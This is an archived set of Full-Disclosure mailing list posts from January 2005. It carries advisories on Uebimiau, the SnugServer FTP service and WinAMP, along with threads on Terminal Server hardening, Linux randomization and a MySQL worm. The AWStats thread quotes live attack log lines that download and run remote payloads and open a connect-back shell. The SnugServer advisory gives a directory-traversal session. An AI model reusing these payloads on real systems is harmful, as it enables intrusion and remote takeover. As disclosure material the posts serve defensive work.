OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
Re: [Full-Disclosure] /usr/bin/trn local root exploit

From: ntx0f (ntx0fseteuid.com)
Date: Thu Jan 27 2005 - 03:54:09 CST


I could be wrong but on my system it's not a suid binary, how's this a
local root?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] /usr/bin/trn local root exploit

From: Wojciech Pawlikowski (wojtekvline.pl)
Date: Thu Jan 27 2005 - 04:25:13 CST


On Thu, Jan 27, 2005 at 04:54:09AM -0500, ntx0f wrote:
> I could be wrong but on my system it's not a suid binary, how's this a
> local root?

Maybe, by using some jedi mind tricks ? ;)

--
* Wojciech Pawlikowski :: <ducer at hard-core pl> :: NIC-HDL WP5161-RIPE *
* http://ducer.w00nf.org :: http://www.knockdownhc.com :: Born to Hate *
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] ITTS ADVISORE 01/05 - Uebimiau <= 2.7.2 Multiples Vulnerabilities

From: Martin Fallon (mar_fallonyahoo.com.br)
Date: Thu Jan 27 2005 - 06:09:00 CST


ADVISORE 01 15/01/2005

INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORE

       http://www.intruders.com.br/
       http://www.intruders.org.br/

ADVISORE/0105 - UEBIMIAU < 2.7.2 MULTIPLES
VULNERABILITIES

PRIORITY: HIGH

I - INTRODUCTION:
----------------

>From http://www.uebimiau.org/

"UebiMiau is a simple, yet efficient cross-plataform
POP3/IMAP mail
reader written in PHP. It's have some many features,
such as: Folders,
View and Send Attachments, Preferences, Search, Quota
Limit, etc.
UebiMiau DOES NOT require database or extra PHP
modules (--with-imap)"

II - DESCRIPTION:
------------------

Intruders Tiger Team Security has identified multiples
vulnerabilities in Uebimiau WebMail Server in default
installation that can be exploited by malicious users
to hijacking session files and others informations
in target system.
 
Intruders Tiger Team Security has discovered that many
systems are vulnerables.

III - ANALYSIS
---------------

Uebimiau in default installation create one
temporary folder to store "sessions" and other
files. This folder is defined in "inc/config.php"
as "./database/".

If the web administrator don't change this
folder, one attacker can exploit this using
the follow request:

http://server-target/database/_sessions/

If the Web server permit "directory listing",
the attacker can read session files.

Other problem live in the way that the files
of users are stored. In default installation
the files of the users are stored using
the follow model:

$temporary_directory/<user>_<domain>/

A attacker can access files of users requesting:

http://server-target/database/user_domain/

Where user is the target user and domain is
the target domain.

Intruders Tiger Team Security has found many
servers vulnerable to these attacks.

IV. DETECTION
-------------

Intruders Tiger Team Security has confirmed the
existence
of this vulnerability in Uebimiau version 2.7.2.
 
Other versions possibly vulnerable too.

V. WORKAROUND
--------------

1 STEP - Insert index.php in each directory of the
Uebimiau.

2 STEP - Set variable $temporary_directory to a
directory
not public and with restricted access, set permission
as read
only to "web server user" for each files in
$temporary_directory.

3 STEP - Set open_basedir in httpd.conf to yours
clients follow
the model below:

<Directory /server-target/public_html>
php_admin_value open_basedir
/server-target/public_html
</Directory>

VI - VENDOR RESPONSE
--------------------

15/01/2005 - Flaw discovered.
18/01/2005 - Contacted Uebimiau Team.
20/01/2005 - Vendor response.
26/01/2005 - Advisore published.

VII - CREDITS
-------------

Glaudson Ocampos(Nash Leon) and Intruders Tiger Team
Security has discovery this vulnerability.
 
Thanks to Wendel Guglielmetti Henrique (dum_dum) and
Waldemar Nehgme from securityopensource.org.br.
 
Visit Intruders Tiger Team Security Web Site for
more advisores:
  
http://www.intruders.com.br/
http://www.intruders.org.br/

        
        
                
_______________________________________________________
Yahoo! Acesso Grtis - Instale o discador do Yahoo! agora. http://br.acesso.yahoo.com/ - Internet rpida e grtis
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Re: Slackware security updates

From: Matteo Giannone (rebonzolibero.it)
Date: Thu Jan 27 2005 - 09:28:59 CST


On the home page www.slackware.com read the news:

/*
2004-11-27

Pat made a new entry in the ChangeLog giving us all some fresh news about his
health conditions.

He also stated (Pat's gpg signed message) that the security packages (patches)
from the GUS-BR group (GUS GPG KEY) are trusted.

EDITED on 2004-12-07
A mirror of the GUS-BR tree can be found on osuosl (ftp and http).
*/

There are no official patches in the website since november 2004, you should
manually update your system...
Or trust someone else's packages..
Or track the slackware-current...

Matteo Giannone

____________________________________________________________
Navighi a 2 MEGA e i primi 3 mesi sono GRATIS.
Scegli Libero Adsl Flat senza limiti su http://www.libero.it

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Slackware Security updates

From: ALD, Aditya, Aditya Lalit Deshmukh (aditya.deshmukhonline.gateway.expertworks.net)
Date: Thu Jan 27 2005 - 03:12:13 CST


>I've seen linux distributions sometimes posting here on
>full-disclosure it's security updates.

Guys I always wanted to bring this up why do we have to send the updates to
this list ? Why not make aother list just for this or anyone who wants the
security alerts could get them directly from the original source.... Maybe
this might save a lot of bandwidth

-aditya

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Terminal Server vulnerabilities

Valdis.Kletnieksvt.edu
Date: Thu Jan 27 2005 - 09:50:54 CST


On Thu, 27 Jan 2005 09:00:39 +0100, "Nicolas RUFF (lists)" said:

> But I would point out something much more important : there are many
> more local exploits than remote (on Windows just like any other OS).
>
> Local exploits : about 1-2 a month
> * POSIX - OS/2 subsystem exploitation
> * Debugging subsystem exploitation (DebPloit)
> * 16-bit subsystem exploitation (NTVDM)
> * Shatter Attacks
> * Etc.
>
> Remote exploits : about once a year
> * RPC/DCOM (blaster)
> * LSASS (sasser)
>
> Basically, if you are logged in as an unpriviledged user on a Terminal
> Server, you can easily become SYSTEM. If this Terminal Server is also a
> Domain Controller, game over.

You forgot one important factor - the use of IE and Outlook for the fast
direct-to-customer delivery of local exploits. Which *also* results in
a Game Over....

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFB+Q3ecC3lWbTT17ARAigkAJ9N5FyrzZ4qqBR4mEhi5QkB5mJgAQCgnv7d
YFpkOQI6xzGXh6LljcW4UBU=
=S8ka
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [lists] [Full-Disclosure] Terminal Server vulnerabilities

From: ALD, Aditya, Aditya Lalit Deshmukh (aditya.deshmukhonline.gateway.expertworks.net)
Date: Thu Jan 27 2005 - 03:02:01 CST


 

>Of course, one of the very first things you should do on a Windows box
>is rename the administrator account, so this kind of blind
>brute-forcing is not possible.

There are ways to find out the usernames that are admin they begin with 500_
( do a Google search if you want )

Any script kiddy worth his salt will tell u this... So this one is off
because renaming admin account will only be security thru obscurity witch is
not good for the internet...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [lists] [Full-Disclosure] Terminal Server vulnerabilities

From: Jan Muenther (jan.muenthernruns.com)
Date: Thu Jan 27 2005 - 10:18:14 CST


> There are ways to find out the usernames that are admin they begin with 500_
> ( do a Google search if you want )
>
> Any script kiddy worth his salt will tell u this... So this one is off
> because renaming admin account will only be security thru obscurity witch is
> not good for the internet...

It's also only possible when you've got NetBIOS/CIFS open to the Internet,
which is something even worse on the Internet. Even though the SID/RID of the
administrator can be determined remotely under these conditions, I'd
still recommend the renaming of the account as a standard hardening procedure.

And fwiw, the fact that a security safeguard can be overcome is not a reason to
completely disregard it. With this argumentation, you could sell your firewalls.

Cheers, j.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service

mutszahav.net.il
Date: Thu Jan 27 2005 - 09:37:41 CST


See Security, Research and Development
www.see-security.com
------------------------------------------------------

[-] Product Information

SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique
firewall file system where your FTP files can be stored in a
data file to prevent internal network hacker attacks. Product
Homepage: http://www.snugserver.com/

[-] Vulnerability Description

A file traversal vulnerability has been discovered in
SnugServer 3.0.0.40 FTP Service, which allows access to the
server filesystem, outside of ftproot.

[-]PoC

rootWhoppix:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220-
 Welcome FTP User. SnugServer is ready.
 Name (192.168.1.154:root): mutsdefault.com
331 Password required for mutsdefault.com.
Password:
230 See FTP Server
Remote system type is You.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
 drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
 drw-rw-rw- 1 owner group 0 Jan 21 02:08 dir
226 Transfer Complete.
ftp> cd ...
200 PORT Command Successful.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Cert
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Logs
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Requests
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Scripts
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Errors
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Queue
drw-rw-rw- 1 owner group 0 Jan 21 03:51 www
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Infected
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Temp
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Filtered
drw-rw-rw- 1 owner group 0 Jan 21 03:51 BaseData
-rw-rw-rw- 1 owner group 8421376 Jan 21 03:52 SNUG.FDB
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ftp
-rw-rw-rw- 1 owner group 1861120 Jan 21 03:52 Snug.gbk
-rw-rw-rw- 1 owner group 32 Jan 21 03:52 yarrow.rnd
226 Transfer Complete.
ftp>
 
[-] Patch

The vendor has been notified, and an update is available at:
 
http://www.snugserver.com/download.php

[-] Credits

This vulnerability was discovered by muts
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote code execution

From: Niels Bakker (niels-bugtraqbakker.net)
Date: Wed Jan 26 2005 - 19:44:49 CST


* krustevkrustev.net (Delian Krustev) [Thu 27 Jan 2005, 01:44 CET]:
> There's an exploit in the wild. Here's what it does:
>
> 200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

It's been out there for a while already:

208.53.170.6 - - [29/Dec/2004:12:20:43 +0100] "GET /cgi-bin/awstats.pl?year=2003&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Ajrown.com/ssh.a;perl%20ssh.a;wget%20jrown.com/buy/bot.txt;perl%20bot.txt;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%%0A20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%0A%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5%0AD%29.%2527 HTTP/1.1" 200 47768 "-" "LWP::Simple/5.800"

Those files don't exist there anymore.

        -- Niels.

--
(please reply to niels=bugtraq instead of niels-bugtraq - except for
 the gazillion autoresponders of course)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Slackware Security updates

From: Rodrigo Barbosa (rodrigobsuespammers.org)
Date: Thu Jan 27 2005 - 10:41:59 CST


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Maybe you should contact the Slackware maintainer(s) regarding this.

FD has no control over slackware or any other distributions.

[]s

On Wed, Jan 26, 2005 at 02:57:00PM -0200, Carlos de Oliveira wrote:
> Hi there!
>
> I've seen linux distributions sometimes posting here on
> full-disclosure it's security updates.
> I use slackware linux for some time, but i never give the importance
> to slackware updates and i want to know why there are no slackware
> updates announces here?
>
> Maybe slackware is so powerful that it doesn't need patches? ehheehh
> Or, where I can get the slack patches?
>
> Once again sorry my poor english, I am training.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

- --
Rodrigo Barbosa <rodrigobsuespammers.org>
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQFB+RnXpdyWzQ5b5ckRAlaMAJ96KQRiWxgcR+IjuafKO9b5djy2CgCbBXEX
+lckv/IX8eUx9aOER8FmJa4=
=R2W9
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] "Advances in Security" in the Linux Kernel and RedHat idiocy

From: Brad Spengler (spendergrsecurity.net)
Date: Thu Jan 27 2005 - 10:10:43 CST


Just wanted to point out to you guys the INCREDIBLE advances in Linux
security underway on LKML from security expert Arjan van de Ven:

http://lkml.org/lkml/2005/1/27/62

On the subject of his i386-only mmap randomization patch:

The randomisation range is 1 megabyte (this is bigger than the stack
randomisation since the stack randomisation only needs 16 bytes alignment
while the mmap needs page alignment, a 64kb range would not have given
enough entropy to be effective)

If we do a little math..
1048576 / 4096 = 256
65536 / 16 = 4096

256 different locations for the mmap base, 4096 different locations for
the stack (and apparently argv/envp pages get no randomization)

Anyone with half a brain would see this is a joke, but not security
expert Arjan van de Ven:

http://lkml.org/lkml/2005/1/27/56

"full randomisation makes it not possible to use absolute addresses in
the exploit."

I guess anyone who thinks that taking a hardcoded exploit and running it
256 times would always result in a successful exploit is stupid.

In true non-hackery fashion, it has a sysctl entry that will disable
randomization entirely if for instance a single developer on the system
needs to debug a single application:

http://lkml.org/lkml/2005/1/27/57

But then someone complained that it should be more fine-grained, so now
if PT_GNU_STACK is disabled on the app, randomization will be turned off
as well. I guess that's RedHat's definition of it.

And remember kids, if you're owning Fedora or RHEL, you can bypass all
this "randomization" (the junk in Exec-shield isn't any better) for suid
apps by abusing a vuln in RedHat's glibc that leaks randomization info
by using LD_DEBUG=files or LD_DEBUG=all or LD_TRACE_PRELINKING
BTW, this remains unfixed since *AUGUST* of last year. Bugzilla reports
were filed, even an LWN article was posted about the problem:

http://lwn.net/Articles/99137/

3 months later, on December 7th, Jakub committed a "fix" to glibc that I
guess he never tested. The only change made was to add LD_DEBUG to
unsecvars.h. If he had bothered to listen to other people, or looked at
the fixes from other distros, he would have seen his "fix" wasn't
enough.

Yet now he's rejecting any bug reports on the subject, claiming he has
fixed the problem:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=146207

Yet I've just verified from two separate users of Fedora Core 3 that the
problem is indeed *NOT* fixed, verifying my analysis of elf/rtld.c that
it was not fixed.

Tilting the scale of security hype back to reality,
-Brad

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFB+RKBmHm2SUJF1GoRAqL9AJ42rMyQYfS8gjG3s+DWRB015G7xvgCfamFt
n/URXna1RAY6tIrXa5WN744=
=K4Ic
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Terminal services-additional help

From: Edward Beuerlein (ebeuerleexcite.com)
Date: Wed Jan 26 2005 - 16:16:42 CST


In addition,
You can install cygwin(www.cygwin.com) with openssh and tunnel terminal services through openssh(very simple to do with putty). And then use your router or firewall to block port 3389.
-Eddie B.

On Tue, 25 Jan 2005 14:38:30 -0600, Curt Purdy <purdy at tecman.com> wrote:

> The problem with terminal server is not any vulnerablities that can be
> exploited, but the fact that administrator can be bruteforced (6 attempts
> followed by reconnect) and that it is screaming its existence on port 3889.
> If you use it, definitely change the port in the registry.

>>You can use the local security policy to prevent administrators from
>>logging in via terminal services and then enable "run as" for
>>administrative tasks...which should be done anyway. Changing the >>port
>>number is another good step though.
>>
>>--
>>Jonathan

_______________________________________________
Join Excite! - http://www.excite.com
The most personalized portal on the Web!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name

From: NSFOCUS Security Team (securitynsfocus.com)
Date: Thu Jan 27 2005 - 03:19:13 CST


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NSFOCUS Security Advisory(SA2005-01)

Topic: Buffer Overflow in WinAMP in_cdda.dll CDA Device Name

Release Date: 2005-01-27

CVE CAN ID: CAN-2004-1150

http://www.nsfocus.com/english/homepage/research/0501.htm

Affected systems & software
===========================
Nullsoft WinAMP 5.0
Nullsoft WinAMP 5.01
Nullsoft WinAMP 5.02
Nullsoft WinAMP 5.03
Nullsoft WinAMP 5.04
Nullsoft WinAMP 5.05
Nullsoft WinAMP 5.06
Nullsoft WinAMP 5.07
Nullsoft WinAMP 5.08

Unaffected systems & software
=============================
Nullsoft WinAMP 2.X
Nullsoft WinAMP 5.08c

Summary
=========

WinAMP is a popular media player that supports various media and playlist
formats, including playlists in m3u or pls format.
  
NSFocus Security Team has found a buffer overflow vulnerability in the
plug-in by which WinAMP plays CD. An attacker can construct a malicious playlist
file that is embedded in a HTML page. If a user is persuaded to click it,
then the attacker can gain complete control over the user's system.

Description
============

WinAMP implements various functionalities through different plug-ins that
are stored in "plugins" sub-directory of WinAMP installation directory. For
example, in_mp3.dll is used to play MP3 files and in_cdda.dll is used to
play CD.
  
The in_cdda.dll of WinAMP supports play path requests in the following format:

  1. <Driver\><PathName\>[FileName].cda
  2. linein://
  3. cda://
  4. cda://<Driver>
  5. cda://<Driver>,<TrackNumber>
  
Brett Moore of Security-Assessment.com discovered a stack overflow when in_cdda.dll
handles the first path. WinAMP released version 5.07 to fix that vulnerability.

Actually, in_cdda.dll will still cause an overflow when handling 4th and 5th
path above. Stack overflow will be triggered only by adding an over-long device
name or sound track number behind "cda://".

Any method that can pass a play path to WinAMP can be used to trigger this
vulnerability, for example, command line.

One possible remote attacking vector is to construct a playlist file in m3u
or pls format with an over-long path embedded in HTML. Once a user visits
such a malicious page, it will execute the code of attacker's choice.

Workaround
=============

NSFOCUS suggests to remove in_cdda.dll from Plugins of WinAMP.

Vendor Status
==============

2004.11.24 Informed the vendor supportwinamp.com, no response
2004.12.06 Tests proved winamp 5.07 is affected, informed the vendor again
2004.12.07 The vendor confirmed the vulnerability
2004.12.25 Tests proved winamp 5.08 is affected, informed the vendor
2005.01.10 The vendor released winamp 5.08c to fix the vulnerability

The vendor has released winamp 5.08c to fix this vulnerability. The latest
version is available at http://www.winamp.com/player/

Additional Information
========================

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-1150 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security problems.
Candidates may change significantly before they become official CVE entries.

Acknowledgment
===============

Yu Yang of NSFOCUS Security Team found the vulnerability.

DISCLAIMS
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2005 NSFOCUS. All Rights Reserved. Terms of use.

NSFOCUS Security Team <securitynsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFB+LIY1794d8am9toRAt5+AJ9fhmdoxO3wi4px9hPTftLUDfRllgCfYequ
nhWVWcvuVIs8339yXR+TiPU=
=yjQM
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Security Contact in Vonage

From: Noam Rathaus (noamrbeyondsecurity.com)
Date: Thu Jan 27 2005 - 07:11:24 CST


Hi,

I am looking for a security contact in Vonage (www.vonage.com). I have tried
more than once to call their number, and have stopped waiting after 15minutes
of being put on hold.

--

Noam Rathaus
CTO
Beyond Security Ltd.

http://www.beyondsecurity.com
http://www.securiteam.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Possible new MYSql Worm

From: Thierry Zoller (Thierrysniff-em.com)
Date: Thu Jan 27 2005 - 10:57:50 CST


Dear List ,
Watch out for "Spoolcll.exe" or "connect"s to Port 3306.
http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
http://isc.sans.org/index.php

--
Thierry Zoller
http://www.sniff-em.com/secureit.shtml

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] MDKSA-2005:020 - Updated kdegraphics packages fix buffer overflow vulnerability

From: Vincent Danen (vdanenmandrakesoft.com)
Date: Thu Jan 27 2005 - 09:49:08 CST


On Jan 25, 2005, at 22:57, Rembrandt wrote:

> On Tue, 25 Jan 2005 21:51:01 -0700
> Mandrake Linux Security Team <securitylinux-mandrake.com> wrote:
>
> Dear Mandrake Linux Security Team,
> Why can't you spam another mailinglist?
> Or create an own for your PATCHES....
>
> It nerves to get more then one mail from you at month.
> How do you provide something?
> Codes? ProofOfConcep-Exploits?
> You just write "We fixed..."
> Or in other words "Hey guys there's something wrong with a package
> related to our OS."
>
> If MS would send every patch they wrote a mail to this mailinglist the
> list-owner would kickout MS for that.
> I don't know why it should be different for you or any other OS.

Hmmm... like many other vendors, we "spam" a number of mailing lists
(FD, bugtraq (when they feel like putting new messages through), and
our own security-announce list). Do you rant at Gentoo, Debian,
Ubuntu... (the list goes on) as well?

Anyways, you seem to be a moderately intelligent person so why don't
you setup a filter in sylpheed to send all mail from
securitylinux-mandrake.com to /dev/null? Should be pretty
straightforward. That way you don't have to get "nerved" and the
people who do appreciate the advisories can continue to receive them.

If the list owners asked us to stop, we would respectfully do it. But,
since you're asking, I think I'll just leave it up to you to figure out
how to filter mail (it's a fairly amazing concept once you get it
figured out).

--
"lynx -source http://linsec.ca/vdanen.asc | gpg --import"
{FEE30AD4 : 7F6C A60C 06C2 4811 FA1C A2BC 2EBC 5E32 FEE3 0AD4}

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (Darwin)

iD8DBQFB+Q10LrxeMv7jCtQRAlBDAJ9VdVpyNtRFYWQp6j/BVGopnEp23gCgq5jX
FNU6XI5KLeZtPtyI6zaMLu0=
=v2d5
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] "Advances in Security" in the Linux Kernel and RedHat idiocy

From: Arjan van de Ven (arjanvredhat.com)
Date: Thu Jan 27 2005 - 11:28:12 CST


On Thu, Jan 27, 2005 at 11:10:43AM -0500, Brad Spengler wrote:
> Just wanted to point out to you guys the INCREDIBLE advances in Linux
> security underway on LKML from security expert Arjan van de Ven:
>
> http://lkml.org/lkml/2005/1/27/62
>
> On the subject of his i386-only mmap randomization patch:
>
> The randomisation range is 1 megabyte (this is bigger than the stack
> randomisation since the stack randomisation only needs 16 bytes alignment
> while the mmap needs page alignment, a 64kb range would not have given
> enough entropy to be effective)
>
> If we do a little math..
> 1048576 / 4096 = 256
> 65536 / 16 = 4096
>
> 256 different locations for the mmap base, 4096 different locations for
> the stack (and apparently argv/envp pages get no randomization)
>
> Anyone with half a brain would see this is a joke, but not security
> expert Arjan van de Ven:

I think the joke is on you in this case. There is a large patch series of
which you judge the first steps only. Those steps introduce the
infrastructure and concepts into the kernel, and later patches will tweak
the exact numbers to values with more entropy. ONCE THEY EXISTING
INFRASTRUCTURE IS ACCEPTED AND DEBUGGED.

Maybe you don't understand that, I assume a lot of the other readers of this
list do. You don't plop a huge patch in the linux kernel in one chunk. You
do it in nice small, incremental and debuggable steps.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] spoolcll.exe - new worm being distributed via mysql vulnerability?

From: Jeremy Davis (jdaytonagmail.com)
Date: Thu Jan 27 2005 - 11:23:20 CST


Check out todays diary at SANS.
http://isc.sans.org/

On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey <worriedgmail.com> wrote:
> Aloha,
>
> Earlier tonight, i was sitting here at home doing some normal
> browsing, and work and my firewall alerted me that a program called
> spoolcll.exe was attempting to open up a port which i cannot remember
> now.
>
> i tried killing it, but it just came back, over and over again each
> time spawning itselfs on a new port.
>
> Registry says the worm created a service called "evmon", it cannot be
> paused or stopped, but it can be disabled.
>
> The only information about this worm on google is a discussion at the
> following url: http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
> they are beginning to determinthat it is being distributed via a hole
> in mysql.
>
> Do any of you know anything about this? Thanks in advance.
>
> --
> Love,
> Mike Bailey
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] spoolcll.exe - new worm being distributed viamysql vulnerability?

From: Dolan, Patrick (Patrick.Dolanphns.com)
Date: Thu Jan 27 2005 - 11:47:57 CST


>From the article text:

"The bot uses the "MySQL UDF Dynamic Library Exploit". In order to
launch the exploit, the bot first has to authenticate to mysql as 'root'
user. A long list of passwords is included with the bot, and the bot
will brute force the password."

Looks like this is small part exploit, and large part bad root password
selection. Though I'm not even sure about the exploit part because the
text later says:

"This bot does not use any vulnerability in mysql. The fundamental
weakness it uses is a week[sic] 'root' account."

Patrick Dolan
Information Security Analyst
 
 

-----Original Message-----
From: Jeremy Davis [mailto:jdaytonagmail.com]
Sent: Thursday, January 27, 2005 11:23 AM
To: Mike Bailey
Cc: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] spoolcll.exe - new worm being distributed
viamysql vulnerability?

Check out todays diary at SANS.
http://isc.sans.org/

On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey <worriedgmail.com>
wrote:
> Aloha,
>
> Earlier tonight, i was sitting here at home doing some normal
> browsing, and work and my firewall alerted me that a program called
> spoolcll.exe was attempting to open up a port which i cannot remember
> now.
>
> i tried killing it, but it just came back, over and over again each
> time spawning itselfs on a new port.
>
> Registry says the worm created a service called "evmon", it cannot be
> paused or stopped, but it can be disabled.
>
> The only information about this worm on google is a discussion at the
> following url:
> http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
> they are beginning to determinthat it is being distributed via a hole
> in mysql.
>
> Do any of you know anything about this? Thanks in advance.
>
> --
> Love,
> Mike Bailey
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Disclaimer:
This electronic message, including any attachments, is confidential and intended solely for use of the intended recipient(s). This message may contain information that is privileged or otherwise protected from disclosure by applicable law. Any unauthorized disclosure, dissemination, use or reproduction is strictly prohibited. If you have received this message in error, please delete it and notify the sender immediately.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] spoolcll.exe - new worm being distributed via mysql vulnerability?

From: stephane nasdrovisky (stephane.nasdroviskyparadigmo.com)
Date: Thu Jan 27 2005 - 12:02:55 CST


>> my firewall alerted me that a program called spoolcll.exe
>> the worm created a service called "evmon"
>>
>> The only information about this worm on google is a discussion at the
>> following url:
>> http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
>> they are beginning to determin that it is being distributed via a hole
>> in mysql.
>
There is a slashdot.org article & comments. It looks like it exploits a
few sysadmin brain vulnerabilities: weak password, bad practice. I guess
the mysql vulnerability is required for copying&executing the bot.

